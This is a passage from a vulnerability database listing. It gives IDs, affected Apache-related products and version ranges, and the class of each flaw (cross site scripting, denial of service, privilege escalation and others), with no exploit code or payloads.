14029| [103552] Apache OpenMeetings 3.2.0 Chat cross site scripting
14030| [103551] Apache OpenMeetings 3.1.0 XML unknown vulnerability
14031| [103521] Apache HTTP Server 2.4.26 HTTP2 Free memory corruption
14032| [103520] Apache HTTP Server up to 2.2.33/2.4.26 mod_auth_digest Authorization Header memory corruption
14033| [103519] Apache Struts up to 2.5.11/2.3.32 Spring AOP denial of service
14034| [103518] Apache Struts up to 2.5.11 URLValidator directory traversal
14035| [103492] Apache Spark up to 2.1.x Web UI Reflected cross site scripting
14036| [103401] Apache Struts 2.3.x Struts 1 Plugin ActionMessage privilege escalation
14037| [103399] Apache Traffic Control Traffic Router TCP Connection Slowloris denial of service
14038| [103387] Apache Impala up to 2.8.0 StatestoreSubscriber weak encryption
14039| [103386] Apache Impala up to 2.7.x/2.8.0 Kerberos weak authentication
14040| [103352] Apache Solr Node weak authentication
14041| [102897] Apache Ignite up to 2.0 Update Notifier information disclosure
14042| [102878] Code42 CrashPlan 5.4.x RMI Server org.apache.commons.ssl.rmi.DateRMI privilege escalation
14043| [102698] Apache HTTP Server up to 2.2.32/2.4.25 mod_mime Content-Type memory corruption
14044| [102697] Apache HTTP Server 2.2.24/2.2.32 HTTP Strict Parsing ap_find_token Request Header memory corruption
14045| [102690] Apache HTTP Server up to 2.2.32/2.4.25 mod_ssl ap_hook_process_connection() denial of service
14046| [102689] Apache HTTP Server up to 2.2.32/2.4.25 ap_get_basic_auth_pw weak authentication
14047| [102622] Apache Thrift up to 0.9.2 Client Libraries skip denial of service
14048| [102538] Apache Ranger up to 0.7.0 Authorizer unknown vulnerability
14049| [102537] Apache Ranger up to 0.7.0 Wildcard Character unknown vulnerability
14050| [102536] Apache Ranger up to 0.6 Stored cross site scripting
14051| [102535] Apache Ranger up to 0.6.2 Policy Engine unknown vulnerability
14052| [102255] Apache NiFi up to 0.7.3/1.2.x Response Header privilege escalation
14053| [102254] Apache NiFi up to 0.7.3/1.2.x UI cross site scripting
14054| [102070] Apache CXF Fediz up to 1.1.2/1.2.0 Application Plugin denial of service
14055| [102020] Apache Tomcat up to 9.0.0.M1 Java Servlet HTTP Method unknown vulnerability
14056| [101858] Apache Hive up to 1.2.1/2.0.0 Client weak authentication
14057| [101802] Apache KNOX up to 0.11.0 WebHDFS privilege escalation
14058| [101928] HPE Aruba ClearPass Apache Tomcat information disclosure
14059| [101524] Apache Archiva up to 1.x/2.2.1 REST Endpoint cross site request forgery
14060| [101513] Apache jUDDI 3.1./3.1.2/3.1.3/3.1.4 Logout Open Redirect
14061| [101430] Apache CXF Fediz up to 1.3.1 OIDC Service cross site request forgery
14062| [101429] Apache CXF Fediz up to 1.2.3/1.3.1 Plugins cross site request forgery
14063| [100619] Apache Hadoop up to 2.6.x HDFS Servlet unknown vulnerability
14064| [100618] Apache Hadoop up to 2.7.0 HDFS Web UI cross site scripting
14065| [100621] Adobe ColdFusion 10/11/2016 Apache BlazeDS Library Deserialization privilege escalation
14066| [100205] Oracle MySQL Enterprise Monitor up to 3.1.6.8003/3.2.1182/3.3.2.1162 Apache Commons FileUpload denial of service
14067| [100191] Oracle Secure Global Desktop 4.71/5.2/5.3 Web Server (Apache HTTP Server) information disclosure
14068| [100162] Oracle StorageTek Tape Analytics SW Tool up to 2.2.0 Apache Commons Collections privilege escalation
14069| [100160] Oracle StorageTek Tape Analytics SW Tool up to 2.2.0 Apache Trinidad unknown vulnerability
14070| [99969] Oracle WebCenter Sites 11.1.1.8.0 Apache Tomcat memory corruption
14071| [99937] Apache Batik up to 1.8 privilege escalation
14072| [99936] Apache FOP up to 2.1 privilege escalation
14073| [99935] Apache CXF up to 3.0.12/3.1.10 STSClient Cache information disclosure
14074| [99934] Apache CXF up to 3.0.12/3.1.10 JAX-RS XML Security Streaming Client spoofing
14075| [99930] Apache Traffic Server up to 6.2.0 denial of service
14076| [99929] Apache Log4j up to 2.8.1 Socket Server Deserialization privilege escalation
14077| [99925] Apache Traffic Server 6.0.0/6.1.0/6.2.0 HPACK Bomb denial of service
14078| [99738] Ping Identity OpenID Connect Authentication Module up to 2.13 on Apache Mod_auth_openidc.c spoofing
14079| [117569] Apache Hadoop up to 2.7.3 privilege escalation
14080| [99591] Apache TomEE up to 1.7.3/7.0.0-M2 EjbObjectInputStream Serialized Object privilege escalation
14081| [99370] Apache Ignite up to 1.8 update-notifier Document XML External Entity
14082| [99299] Apache Geode up to 1.1.0 Pulse OQL Query privilege escalation
14083| [99572] Apache Tomcat up to 7.0.75/8.0.41/8.5.11/9.0.0.M17 Application Listener privilege escalation
14084| [99570] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 HTTP Connector Cache information disclosure
14085| [99569] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 HTTP/2 GOAWAY Frame Resource Exhaustion denial of service
14086| [99568] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 Pipelined Request information disclosure
14087| [99048] Apache Ambari up to 2.3.x REST API Shell Metacharacter privilege escalation
14088| [99014] Apache Camel Jackson/JacksonXML privilege escalation
14089| [98610] Apple macOS up to 10.12.3 apache_mod_php memory corruption
14090| [98609] Apple macOS up to 10.12.3 apache_mod_php denial of service
14091| [98608] Apple macOS up to 10.12.3 apache_mod_php memory corruption
14092| [98607] Apple macOS up to 10.12.3 apache_mod_php denial of service
14093| [98606] Apple macOS up to 10.12.3 apache_mod_php denial of service
14094| [98605] Apple macOS up to 10.12.3 Apache denial of service
14095| [98604] Apple macOS up to 10.12.3 Apache denial of service
14096| [98603] Apple macOS up to 10.12.3 Apache denial of service
14097| [98602] Apple macOS up to 10.12.3 Apache denial of service
14098| [98601] Apple macOS up to 10.12.3 Apache denial of service
14099| [98517] Apache POI up to 3.14 OOXML File XXE denial of service
14100| [98405] Apache Hadoop up to 0.23.10 privilege escalation
14101| [98199] Apache Camel Validation XML External Entity
14102| [97892] Apache Tomcat up to 9.0.0.M15 Reverse-Proxy Http11InputBuffer.java information disclosure
14103| [97617] Apache Camel camel-snakeyaml Deserialization privilege escalation
14104| [97602] Apache Camel camel-jackson/camel-jacksonxml CamelJacksonUnmarshalType privilege escalation
14105| [97732] Apache Struts up to 2.3.31/2.5.10 Jakarta Multipart Parser Content-Type privilege escalation
14106| [97466] mod_auth_openidc up to 2.1.5 on Apache weak authentication
14107| [97455] mod_auth_openidc up to 2.1.4 on Apache weak authentication
14108| [97081] Apache Tomcat HTTPS Request denial of service
14109| [97162] EMC OpenText Documentum D2 BeanShell/Apache Commons privilege escalation
14110| [96949] Hanwha Techwin Smart Security Manager up to 1.5 Redis/Apache Felix Gogo privilege escalation
14111| [96314] Apache Cordova up to 6.1.1 on Android weak authentication
14112| [95945] Apple macOS up to 10.12.2 apache_mod_php denial of service
14113| [95944] Apple macOS up to 10.12.2 apache_mod_php denial of service
14114| [95943] Apple macOS up to 10.12.2 apache_mod_php memory corruption
14115| [95666] Oracle FLEXCUBE Direct Banking 12.0.0/12.0.1/12.0.2/12.0.3 Apache Commons Collections privilege escalation
14116| [95455] Apache NiFi up to 1.0.0/1.1.0 Connection Details Dialogue cross site scripting
14117| [95311] Apache Storm UI Daemon privilege escalation
14118| [95291] ZoneMinder 1.30.0 Apache httpd privilege escalation
14119| [94800] Apache Wicket up to 1.5.16/6.24.x Deserialize DiskFileItem denial of service
14120| [94705] Apache Qpid Broker for Java up to 6.1.0 SCRAM-SHA-1/SCRAM-SHA-256 User information disclosure
14121| [94627] Apache HTTP Server up to 2.4.24 mod_auth_digest Crash denial of service
14122| [94626] Apache HTTP Server up to 2.4.24 mod_session_crypto Padding weak encryption
14123| [94625] Apache HTTP Server up to 2.4.24 Response Split privilege escalation
14124| [94540] Apache Tika 1.9 tika-server File information disclosure
14125| [94600] Apache ActiveMQ up to 5.14.1 Administration Console cross site scripting
14126| [94348] Apple macOS up to 10.12.1 apache_mod_php denial of service
14127| [94347] Apple macOS up to 10.12.1 apache_mod_php denial of service
14128| [94346] Apple macOS up to 10.12.1 apache_mod_php denial of service
14129| [94345] Apple macOS up to 10.12.1 apache_mod_php denial of service
14130| [94344] Apple macOS up to 10.12.1 apache_mod_php denial of service
14131| [94343] Apple macOS up to 10.12.1 apache_mod_php memory corruption
14132| [94342] Apple macOS up to 10.12.1 apache_mod_php memory corruption
14133| [94128] Apache Tomcat up to 9.0.0.M13 Error information disclosure
14134| [93958] Apache HTTP Server up to 2.4.23 mod_http2 h2_stream.c denial of service
14135| [93874] Apache Subversion up to 1.8.16/1.9.4 mod_dontdothat XXE denial of service
14136| [93855] Apache Hadoop up to 2.6.4/2.7.2 HDFS Service privilege escalation
14137| [93609] Apache OpenMeetings 3.1.0 RMI Registry privilege escalation
14138| [93555] Apache Tika 1.6-1.13 jmatio MATLAB File privilege escalation
14139| [93799] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 JmxRemoteLifecycleListener privilege escalation
14140| [93798] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 JmxRemoteLifecycleListener privilege escalation
14141| [93797] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 HTTP Split privilege escalation
14142| [93796] Apache Tomcat up to 8.5.6/9.0.0.M11 HTTP/2 Header Parser denial of service
14143| [93532] Apache Commons Collections Library Java privilege escalation
14144| [93210] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 ResourceLinkFactory privilege escalation
14145| [93209] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Realm Authentication User information disclosure
14146| [93208] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 System Property Replacement information disclosure
14147| [93207] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Utility Method privilege escalation
14148| [93206] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Configuration privilege escalation
14149| [93098] Apache Commons FileUpload privilege escalation
14150| [92987] Oracle Virtual Desktop Infrastructure up to 3.5.2 Apache Commons Collection memory corruption
14151| [92986] Oracle Virtual Desktop Infrastructure up to 3.5.2 Apache Tomcat memory corruption
14152| [92982] Oracle Insurance IStream 4.3.2 Apache Commons Collections memory corruption
14153| [92981] Oracle Financial Services Lending and Leasing 14.1.0/14.2.0 Apache Commons Collections memory corruption
14154| [92979] Oracle up to 8.0.3 Apache Commons Collections memory corruption
14155| [92977] Oracle FLEXCUBE Universal Banking up to 12.2.0 Apache Commons Collections memory corruption
14156| [92976] Oracle FLEXCUBE Universal Banking 12.87.1/12.87.2 Apache Commons Collections memory corruption
14157| [92975] Oracle FLEXCUBE Private Banking up to 12.1.0 Apache Commons Collections memory corruption
14158| [92974] Oracle FLEXCUBE Investor Servicing 12.0.1 Apache Commons Collections memory corruption
14159| [92973] Oracle 12.0.0/12.1.0 Apache Commons Collections memory corruption
14160| [92972] Oracle FLEXCUBE Core Banking 11.5.0.0.0/11.6.0.0.0 Apache Commons Collections memory corruption
14161| [92962] Oracle Agile PLM 9.3.4/9.3.5 Apache Commons Collections memory corruption
14162| [92909] Oracle Agile PLM 9.3.4/9.3.5 Apache Tomcat unknown vulnerability
14163| [92786] Oracle Banking Digital Experience 15.1 Apache Commons Collections information disclosure
14164| [92549] Apache Tomcat on Red Hat privilege escalation
14165| [92509] Apache Tomcat JK ISAPI Connector up to 1.2.41 jk_uri_worker_map.c memory corruption
14166| [92314] Apache MyFaces Trinidad up to 1.0.13/1.2.15/2.0.1/2.1.1 CoreResponseStateManager memory corruption
14167| [92313] Apache Struts2 up to 2.3.28/2.5.0 Action Name Cleanup cross site request forgery
14168| [92299] Apache Derby up to 10.12.1.0 SqlXmlUtil XML External Entity
14169| [92217] Apache ActiveMQ Artemis up to 1.3.x Broker/REST GetObject privilege escalation
14170| [92174] Apache Ranger up to 0.6.0 Policy cross site scripting
14171| [91831] Apache Jackrabbit up to 2.13.2 HTTP Header cross site request forgery
14172| [91825] Apache Zookeeper up to 3.4.8/3.5.2 C CLI Shell memory corruption
14173| [91818] Apache CXF Fediz up to 1.2.2/1.3.0 Application Plugin privilege escalation
14174| [92056] Apple macOS up to 10.11 apache_mod_php memory corruption
14175| [92055] Apple macOS up to 10.11 apache_mod_php memory corruption
14176| [92054] Apple macOS up to 10.11 apache_mod_php denial of service
14177| [92053] Apple macOS up to 10.11 apache_mod_php denial of service
14178| [92052] Apple macOS up to 10.11 apache_mod_php denial of service
14179| [92051] Apple macOS up to 10.11 apache_mod_php memory corruption
14180| [92050] Apple macOS up to 10.11 apache_mod_php denial of service
14181| [92049] Apple macOS up to 10.11 apache_mod_php memory corruption
14182| [92048] Apple macOS up to 10.11 apache_mod_php denial of service
14183| [92047] Apple macOS up to 10.11 apache_mod_php memory corruption
14184| [92046] Apple macOS up to 10.11 apache_mod_php memory corruption
14185| [92045] Apple macOS up to 10.11 apache_mod_php memory corruption
14186| [92044] Apple macOS up to 10.11 apache_mod_php memory corruption
14187| [92043] Apple macOS up to 10.11 apache_mod_php denial of service
14188| [92042] Apple macOS up to 10.11 apache_mod_php memory corruption
14189| [92041] Apple macOS up to 10.11 apache_mod_php memory corruption
14190| [92040] Apple macOS up to 10.11 Apache Proxy privilege escalation
14191| [91785] Apache Shiro up to 1.3.1 Servlet Filter privilege escalation
14192| [90879] Apache OpenMeetings up to 3.1.1 SWF Panel cross site scripting
14193| [90878] Apache Sentry up to 1.6.x Blacklist Filter reflect/reflect2/java_method privilege escalation
14194| [90610] Apache POI up to 3.13 XLSX2CSV Example OpenXML Document XML External Entity
14195| [90584] Apache ActiveMQ up to 5.11.3/5.12.2/5.13/1 Administration Web Console privilege escalation
14196| [90385] Apache Archiva up to 1.3.9 addProxyConnector_commit.action cross site scripting
14197| [90384] Apache Archiva up to 1.3.9 addProxyConnector_commit.action cross site request forgery
14198| [90383] Apache OpenOffice up to 4.1.2 Impress File memory corruption
14199| [89670] Apache Tomcat up to 8.5.4 CGI Servlet Environment Variable Open Redirect
14200| [89669] Apache HTTP Server up to 2.4.23 RFC 3875 Namespace Conflict Environment Variable Open Redirect
14201| [89726] Apple Mac OS X up to 10.11.5 apache_mod_php memory corruption
14202| [89484] Apache Qpid up to 0.13.0 on Windows Proton Library Certificate weak authentication
14203| [89473] HPE iMC PLAT/EAD/APM/iMC NTA/iMC BIMS/iMC UAM_TAM up to 7.2 Apache Commons Collections Library Command privilege escalation
14204| [90263] Apache Archiva Header denial of service
14205| [90262] Apache Archiva Deserialize privilege escalation
14206| [90261] Apache Archiva XML DTD Connection privilege escalation
14207| [88827] Apache Xerces-C++ up to 3.1.3 DTD Stack-Based memory corruption
14208| [88747] Apache HTTP Server 2.4.17/2.4.18 mod_http2 denial of service
14209| [88608] Apache Struts up to 2.3.28.1/2.5.0 URLValidator Null Value denial of service
14210| [88607] Apache Struts up to 2.3.28.1 REST Plugin Expression privilege escalation
14211| [88606] Apache Struts up to 2.3.28.1 Restriction privilege escalation
14212| [88605] Apache Struts up to 2.3.28.1 Restriction privilege escalation
14213| [88604] Apache Struts up to 2.3.28.1 Token Validator cross site request forgery
14214| [88603] Apache Commons FileUpload up to 1.3.1 MultipartStream denial of service
14215| [88602] Apache Struts up to 1.3.10 ActionServlet.java cross site scripting
14216| [88601] Apache Struts up to 1.3.10 Multithreading ActionServlet.java memory corruption
14217| [88600] Apache Struts up to 1.3.10 MultiPageValidator privilege escalation
14218| [89005] Apache Qpid AMQP JMS Client getObject privilege escalation
14219| [87888] Apache Ranger up to 0.5.2 Policy Admin Tool eventTime sql injection
14220| [87835] Apache CloudStack up to 4.5.2.0/4.6.2.0/4.7.1.0/4.8.0.0 SAML-based Authentication privilege escalation
14221| [87806] HPE Discovery and Dependency Mapping Inventory up to 9.32 update 3 Apache Commons Collections Library privilege escalation
14222| [87805] HPE Universal CMDB up to 10.21 Apache Commons Collections Library privilege escalation
14223| [87768] Apache Shiro up to 1.2.4 Cipher Key privilege escalation
14224| [87765] Apache James Server 2.3.2 Command privilege escalation
14225| [88667] Apache HTTP Server up to 2.4.20 mod_http2 Certificate weak authentication
14226| [87718] Apache Struts up to 2.3.24.1 OGNL Caching denial of service
14227| [87717] Apache Struts up to 2.3.28 REST Plugin privilege escalation
14228| [87706] Apache Qpid Java up to 6.0.2 AMQP privilege escalation
14229| [87703] Apache Qbid Java up to 6.0.2 PlainSaslServer.java denial of service
14230| [87702] Apache ActiveMQ up to 5.13.x Fileserver Web Application Upload privilege escalation
14231| [87700] Apache PDFbox up to 1.8.11/2.0.0 XML Parser PDF Document XML External Entity
14232| [87679] HP Release Control 9.13/9.20/9.21 Apache Commons Collections Library Java Object privilege escalation
14233| [87540] Apache Ambari up to 2.2.0 File Browser View information disclosure
14234| [87433] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
14235| [87432] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
14236| [87431] Apple Mac OS X up to 10.11.4 apache_mod_php Format String
14237| [87430] Apple Mac OS X up to 10.11.4 apache_mod_php denial of service
14238| [87429] Apple Mac OS X up to 10.11.4 apache_mod_php information disclosure
14239| [87428] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
14240| [87427] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
14241| [87389] Apache Xerces C++ up to 3.1.3 XML Document DTDScanner.cpp memory corruption
14242| [87172] Adobe ColdFusion 11 Update 7/2016/up to 10 Update 18 Apache Commons Collections Library privilege escalation
14243| [87121] Apache Cordova iOS up to 3.x Plugin privilege escalation
14244| [87120] Apache Cordova iOS up to 3.x URL Whitelist privilege escalation
14245| [83806] HPE Network Node Manager i up to 10.01 Apache Commons Collections Library privilege escalation
14246| [83077] Apache Subversion up to 1.8.15/1.9.3 mod_authz_svn mod_authz_svn.c denial of service
14247| [83076] Apache Subversion up to 1.8.15/1.9.3 svnserve svnserve/cyrus_auth.c privilege escalation
14248| [82790] Apache Struts 2.0.0/2.3.24/2.3.28 Dynamic Method privilege escalation
14249| [82789] Apache Struts 2.0.0/2.3.24/2.3.28 XSLTResult privilege escalation
14250| [82725] HPE P9000 Command View up to 7.x/8.4.0 Apache Commons Collections Library privilege escalation
14251| [82444] Apache Camel up to 2.14.x/2.15.4/2.16.0 HTTP Request privilege escalation
14252| [82389] Apache Subversion up to 1.7.x/1.8.14/1.9.2 mod_dav_svn util.c memory corruption
14253| [82280] Apache Struts up to 1.7 JRE URLDecoder cross site scripting
14254| [82260] Apache OFBiz up to 12.04.05/13.07.02 Java Object privilege escalation
14255| [82259] Apache Qpid Proton up to 0.12.0 proton.reactor.Connector weak encryption
14256| [82250] Apache Ranger up to 0.5.0 Admin UI weak authentication
14257| [82214] Apache Wicket up to 1.5.14/6.21.x/7.1.x Input Element cross site scripting
14258| [82213] Apache Wicket up to 1.5.14/6.21.x/7.1.x ModalWindow Title getWindowOpenJavaScript cross site scripting
14259| [82212] Apache Ranger up to 0.5.0 Policy Admin Tool privilege escalation
14260| [82211] Apache OFBiz up to 12.04.06/13.07.02 ModelFormField.java DisplayEntityField.getDescription cross site scripting
14261| [82082] Apache JetSpeed up to 2.3.0 User Manager Service privilege escalation
14262| [82081] Apache OpenMeetings up to 3.1.0 SOAP API information disclosure
14263| [82080] Apache OpenMeetings up to 3.1.0 Event cross site scripting
14264| [82078] Apache OpenMeetings up to 3.1.0 Import/Export System Backup ZIP Archive directory traversal
14265| [82077] Apache OpenMeetings up to 3.1.0 Password Reset sendHashByUser privilege escalation
14266| [82076] Apache Ranger up to 0.5.1 privilege escalation
14267| [82075] Apache JetSpeed up to 2.3.0 Portal cross site scripting
14268| [82074] Apache JetSpeed up to 2.3.0 cross site scripting
14269| [82073] Apache JetSpeed up to 2.3.0 User Manager Service sql injection
14270| [82072] Apache JetSpeed up to 2.3.0 Portal Site Manager ZIP Archive directory traversal
14271| [82058] Apache LDAP Studio/Directory Studio up to 2.0.0-M9 CSV Export privilege escalation
14272| [82053] Apache Ranger up to 0.4.x Policy Admin Tool privilege escalation
14273| [82052] Apache Ranger up to 0.4.x Policy Admin Tool HTTP Request cross site scripting
14274| [81696] Apache ActiveMQ up to 5.13.1 HTTP Header privilege escalation
14275| [81695] Apache Xerces-C up to 3.1.2 internal/XMLReader.cpp memory corruption
14276| [81622] HPE Asset Manager 9.40/9.41/9.50 Apache Commons Collections Library Java Object privilege escalation
14277| [81406] HPE Service Manager up to 9.35 P3/9.41 P1 Apache Commons Collections Library Command privilege escalation
14278| [81405] HPE Operations Orchestration up to 10.50 Apache Commons Collections Library Command privilege escalation
14279| [81427] Apple Mac OS X up to 10.11.3 apache_mod_php PNG File memory corruption
14280| [81426] Apple Mac OS X up to 10.11.3 apache_mod_php PNG File memory corruption
14281| [81372] Apache Struts up to 2.3.24.1 I18NInterceptor cross site scripting
14282| [81371] Apache Struts up to 2.3.24.1 Double OGNL Evaluation privilege escalation
14283| [81370] Apache Struts up to 2.3.24.1 Java URLDecoder cross site scripting
14284| [81084] Apache Tomcat 6.0/7.0/8.0/9.0 ServletContext directory traversal
14285| [81083] Apache Tomcat 7.0/8.0/9.0 Index Page cross site request forgery
14286| [81082] Apache Tomcat 7.0/8.0/9.0 ResourceLinkFactory.setGlobalContext privilege escalation
14287| [81081] Apache Tomcat 6.0/7.0/8.0/9.0 Error information disclosure
14288| [81080] Apache Tomcat 6.0/7.0/8.0/9.0 Session Persistence privilege escalation
14289| [81079] Apache Tomcat 6.0/7.0/8.0/9.0 StatusManagerServlet information disclosure
14290| [81078] Apache Tomcat 7.0/8.0/9.0 Session privilege escalation
14291| [80970] Apache Solr up to 5.3.0 Admin UI plugins.js cross site scripting
14292| [80969] Apache Solr up to 5.2 Schema schema-browser.js cross site scripting
14293| [80968] Apache Solr up to 5.0 analysis.js cross site scripting
14294| [80940] HP Continuous Delivery Automation 1.30 Apache Commons Collections Library privilege escalation
14295| [80823] Apache CloudStack up to 4.5.1 KVM Virtual Machine Migration privilege escalation
14296| [80822] Apache CloudStack up to 4.5.1 API Call information disclosure
14297| [80778] Apache Camel up to 2.15.4/2.16.0 camel-xstream privilege escalation
14298| [80750] HPE Operations Manager 8.x/9.0 on Windows Apache Commons Collections Library privilege escalation
14299| [80724] Apache Hive up to 1.2.1 Authorization Framework privilege escalation
14300| [80577] Oracle Secure Global Desktop 4.63/4.71/5.2 Apache HTTP Server denial of service
14301| [80165] Intel McAfee ePolicy Orchestrator up to 4.6.9/5.0.3/5.3.1 Apache Commons Collections Library privilege escalation
14302| [80116] Apache Subversion up to 1.9.2 svn Protocol libsvn_ra_svn/marshal.c read_string memory corruption
14303| [80115] Apache ActiveMQ up to 5.12.x Broker Service privilege escalation
14304| [80036] IBM Cognos Business Intelligence Apache Commons Collections Library InvokerTransformer privilege escalation
14305| [79873] VMware vCenter Operations/vRealize Orchestrator Apache Commons Collections Library Serialized Java Object privilege escalation
14306| [79840] Apache Cordova File Transfer Plugin up to 1.2.x on Android unknown vulnerability
14307| [79839] Apache TomEE Serialized Java Stream EjbObjectInputStream privilege escalation
14308| [79791] Cisco Products Apache Commons Collections Library privilege escalation
14309| [79539] Apple Mac OS X up to 10.11.1 apache_mod_php memory corruption
14310| [79538] Apple Mac OS X up to 10.11.1 apache_mod_php memory corruption
14311| [79294] Apache Cordova-Android up to 3.6 BridgeSecret Random Generator weak encryption
14312| [79291] Apache Cordova-Android up to 4.0 Javascript Whitelist privilege escalation
14313| [79244] Apache CXF up to 2.7.17/3.0.7/3.1.2 SAML Web SSO Module SAML Response weak authentication
14314| [79243] Oracle WebLogic Server 10.3.6.0/12.1.2.0/12.1.3.0/12.2.1.0 WLS Security com.bea.core.apache.commons.collections.jar privilege escalation
14315| [78989] Apache Ambari up to 2.1.1 Open Redirect
14316| [78988] Apache Ambari up to 2.0.1/2.1.0 Password privilege escalation
14317| [78987] Apache Ambari up to 2.0.x cross site scripting
14318| [78986] Apache Ambari up to 2.0.x Proxy Endpoint api/v1/proxy privilege escalation
14319| [78780] Apple Mac OS X up to 10.11.0 apache_mod_php denial of service
14320| [78779] Apple Mac OS X up to 10.11.0 apache_mod_php denial of service
14321| [78778] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
14322| [78777] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
14323| [78776] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
14324| [78775] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
14325| [78774] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
14326| [78297] Apache Commons Components HttpClient up to 4.3.5 HTTPS Timeout denial of service
14327| [77406] Apache Flex BlazeDS AMF Message XML External Entity
14328| [77429] Apache ActiveMQ up to 5.10.0 LDAPLoginModule privilege escalation
14329| [77399] Apache ActiveMQ up to 5.10.0 LDAPLoginModule weak authentication
14330| [77375] Apache Tapestry up to 5.3.5 Client-Side Object Storage privilege escalation
14331| [77331] Apache ActiveMQ up to 5.11.1 on Windows Fileserver Upload/Download directory traversal
14332| [77299] Apache Solr Real-Time Module up to 7.x-1.1 Index Content information disclosure
14333| [77247] Apache ActiveMQ up to 5.10 TransportConnection.java processControlCommand denial of service
14334| [77083] Apache Groovy up to 2.4.3 MethodClosure.java MethodClosure memory corruption
14335| [76953] Apache Subversion 1.7.0/1.8.0/1.8.10 svn_repos_trace_node_locations information disclosure
14336| [76952] Apache Subversion 1.7.0/1.8.0/1.8.10 mod_authz_svn anonymous/authenticated information disclosure
14337| [76567] Apache Struts 2.3.20 unknown vulnerability
14338| [76733] Apache HTTP Server 2.4.7/2.4.8/2.4.9/2.4.10/2.4.12 ap_some_auth_required unknown vulnerability
14339| [76732] Apache HTTP Server 2.4.7/2.4.8/2.4.9/2.4.10/2.4.12 Request apr_brigade_flatten privilege escalation
14340| [76731] Apache HTTP Server 2.4.12 ErrorDocument 400 Crash denial of service
14341| [75690] Apache Camel up to 2.13.3/2.14.1 XPathBuilder.java XML External Entity
14342| [75689] Apache Camel up to 2.13.3/2.14.1 XML Converter Setup XmlConverter.java SAXSource privilege escalation
14343| [75668] Apache Sling API/Sling Servlets Post up to 2.2.1 HtmlResponse cross site scripting
14344| [75601] Apache Jackrabbit up to 2.10.0 WebDAV Request XML External Entity
14345| [75420] Apache Tomcat up to 6.0.43/7.0.58/8.0.16 Security Manager privilege escalation
14346| [75145] Apache OpenOffice up to 4.1.1 HWP Filter Crash denial of service
14347| [75032] Apache Tomcat Connectors up to 1.2.40 mod_jk privilege escalation
14348| [75135] PHP 5.4/5.5 HTTP Request sapi_apache2.c apache2handler privilege escalation
14349| [74793] Apache Tomcat File Upload denial of service
14350| [74708] Apple MacOS X up to 10.10.2 Apache denial of service
14351| [74707] Apple MacOS X up to 10.10.2 Apache denial of service
14352| [74706] Apple MacOS X up to 10.10.2 Apache memory corruption
14353| [74705] Apple MacOS X up to 10.10.2 Apache denial of service
14354| [74704] Apple MacOS X up to 10.10.2 Apache denial of service
14355| [74703] Apple MacOS X up to 10.10.2 Apache denial of service
14356| [74702] Apple MacOS X up to 10.10.2 Apache denial of service
14357| [74701] Apple MacOS X up to 10.10.2 Apache cross site request forgery
14358| [74700] Apple MacOS X up to 10.10.2 Apache unknown vulnerability
14359| [74661] Apache Flex up to 4.14.0 asdoc index.html cross site scripting
14360| [74609] Apache Cassandra up to 1.2.19/2.0.13/2.1.3 JMX/RMI Interface privilege escalation
14361| [74469] Apache Xerces-C up to 7.0 internal/XMLReader.cpp denial of service
14362| [74468] Apache Batik up to 1.6 denial of service
14363| [74414] Apache Mod-gnutls up to 0.5.1 Authentication spoofing
14364| [74371] Apache Standard Taglibs up to 1.2.0 memory corruption
14365| [74367] Apache HTTP Server up to 2.4.12 mod_lua lua_request.c wsupgrade denial of service
14366| [74174] Apache WSS4J up to 2.0.0 privilege escalation
14367| [74172] Apache ActiveMQ up to 5.5.0 Administration Console cross site scripting
14368| [69092] Apache Tomcat up to 6.0.42/7.0.54/8.0.8 HTTP Request Smuggling privilege escalation
14369| [73831] Apache Qpid up to 0.30 Access Restriction unknown vulnerability
14370| [73731] Apache XML Security unknown vulnerability
14371| [68660] Oracle BI Publisher 10.1.3.4.2/11.1.1.7 Apache Tomcat cross site scripting
14372| [73659] Apache CloudStack up to 4.3.0 Stack-Based unknown vulnerability
14373| [73593] Apache Traffic Server up to 5.1.0 denial of service
14374| [73511] Apache POI up to 3.10 Deadlock denial of service
14375| [73510] Apache Solr up to 4.3.0 cross site scripting
14376| [68447] Apache Subversion up to 1.7.18/1.8.10 mod_dav_svn Crash denial of service
14377| [68446] Apache Subversion up to 1.7.18/1.8.10 REPORT Request Crash denial of service
14378| [73173] Apache CloudStack Stack-Based unknown vulnerability
14379| [68357] Apache Struts up to 2.3.16.3 Random Number Generator cross site request forgery
14380| [73106] Apache Hadoop up to 2.4.0 Symlink privilege escalation
14381| [68575] Apache HTTP Server up to 2.4.10 LuaAuthzProvider mod_lua.c privilege escalation
14382| [72890] Apache Qpid 0.30 unknown vulnerability
14383| [72887] Apache Hive 0.13.0 File Permission privilege escalation
14384| [72878] Apache Cordova 3.5.0 cross site request forgery
14385| [72877] Apache Cordova 3.5.0 cross site request forgery
14386| [72876] Apache Cordova 3.5.0 cross site request forgery
14387| [68435] Apache HTTP Server 2.4.10 mod_proxy_fcgi.c handle_headers denial of service
14388| [68065] Apache CXF up to 3.0.1 JAX-RS SAML denial of service
14389| [68064] Apache CXF up to 3.0.0 SAML Token denial of service
14390| [67913] Oracle Retail Markdown Optimization 12.0/13.0/13.1/13.2/13.4 Apache commons-beanutils-1.8.0.jar memory corruption
14391| [67912] Oracle Retail Invoice Matching up to 14.0 Apache commons-beanutils-1.8.0.jar memory corruption
